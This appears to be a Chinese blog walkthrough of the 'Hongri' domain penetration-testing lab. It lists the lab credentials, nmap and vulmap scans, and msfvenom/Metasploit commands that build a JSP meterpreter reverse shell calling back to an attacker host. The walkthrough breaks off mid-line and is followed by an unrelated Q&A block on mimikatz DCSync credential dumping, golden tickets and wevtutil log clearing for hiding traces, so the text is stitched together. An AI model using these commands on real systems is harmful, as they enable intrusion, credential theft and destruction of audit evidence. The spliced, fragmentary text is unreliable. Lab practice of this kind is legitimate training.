渗透测试-红日靶场四

        小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。

一、环境搭建

1. 网络配置

2. 靶机信息

靶机 账号 密码
Ubuntu(外网服务器) ubuntu Ubuntu
win7(域成员) douser Dotest123
win2008(域控) administrator Test2008

3. 启用环境

        开启 ubuntu(外网服务器)靶机,启用 Docker 环境。

        a)cd /home/ubuntu//Desktop/vulhub/struts2/s2-045

        b)cd /home/ubuntu//Desktop/vulhub/tomcat/CVE-2017-12615

        c)cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613

启用:sudo docker-compose up -d    

二、信息收集

1. 扫描 IP

        nmap -sn 192.168.2.0/24                                                          // 探测 活性IP

2. 扫描 端口

        nmap -sS -sV -Pn -T4 192.168.2.135                                        // 端口 探测

端口信息:2001 -> 文件上传        2002 -> apache网页            2003 -> 数据库

3. 漏洞 检测

        Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞验证功能。小编以2002端口为突破口。

        python3 vulmap.py -u http://192.168.2.135:2002                                        // 漏洞 检测

漏洞信息:Tomcat任意写入文件漏洞(CVE-2017-12615)

三、漏洞利用

MSF参数

        a)msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=7773 -f jsp -o shell.jsp        // 创建 jsp 监听脚本

        b)use exploit/multi/handler                                                            // 监听模块

        c)set payload linux/x64/meterpreter/reverse_tcp                          // 载荷

        d)set lhost 192.168.2.129                                                             // 载机

        e)set lport 7773                                                    &nbs

### 红日靶场渗透测试默认密码或登录凭证 在红日靶场渗透测试场景中,默认密码或登录凭证通常不会直接提供给用户,而是需要通过特定的技术手段来获取。以下是关于如何获取登录凭证的相关技术细节: #### 使用 `mimikatz` 获取登录凭据 可以通过工具 `mimikatz` 来提取目标系统的登录凭据。具体命令如下所示: ```bash mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC.de1ay.com /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm ``` 此命令用于同步域控制器上的账户哈希值或其他敏感数据[^1]。 #### 黄金票据生成与利用 为了进一步提升权限,可以考虑生成黄金票据(Golden Ticket)。生成黄金票据的前提条件包括但不限于以下几点: - 需要拥有 krbtgt 账户的 NTLM 哈希值。 - 提供有效的 SID 和域名信息以便构建 Kerberos 票据。 创建黄金票据的具体过程涉及多个参数配置,例如指定用户的 SID、起始时间以及有效期等属性[^2]。 #### 日志清理操作 完成渗透活动之后,建议执行必要的痕迹消除工作以减少被发现的风险。常用的 Windows 事件日志清除方法包括以下几个方面: ```batch wevtutil cl Security // 清理安全审计相关的记录条目 wevtutil cl System // 删除操作系统层面产生的常规警告错误消息等内容 wevtutil cl Application // 移除由应用程序所产生的各类通知提示类别的历史档案资料 wevtutil cl "Windows PowerShell" // 对于PowerShell脚本运行期间所留下的交互式指令序列也要予以销毁处理 wevtutil cl Setup // 同样对于安装部署过程中形成的变更详情同样适用上述原则进行管理控制 ``` 以上命令可以帮助隐藏部分行为轨迹,降低事后分析的可能性[^3]。 需要注意的是,在实际环境中实施这些操作前应确保已获得合法授权或许可权责范围内的许可文件证明材料等相关法律手续齐备后再行动以免触犯法律法规造成不必要的麻烦纠纷等问题发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值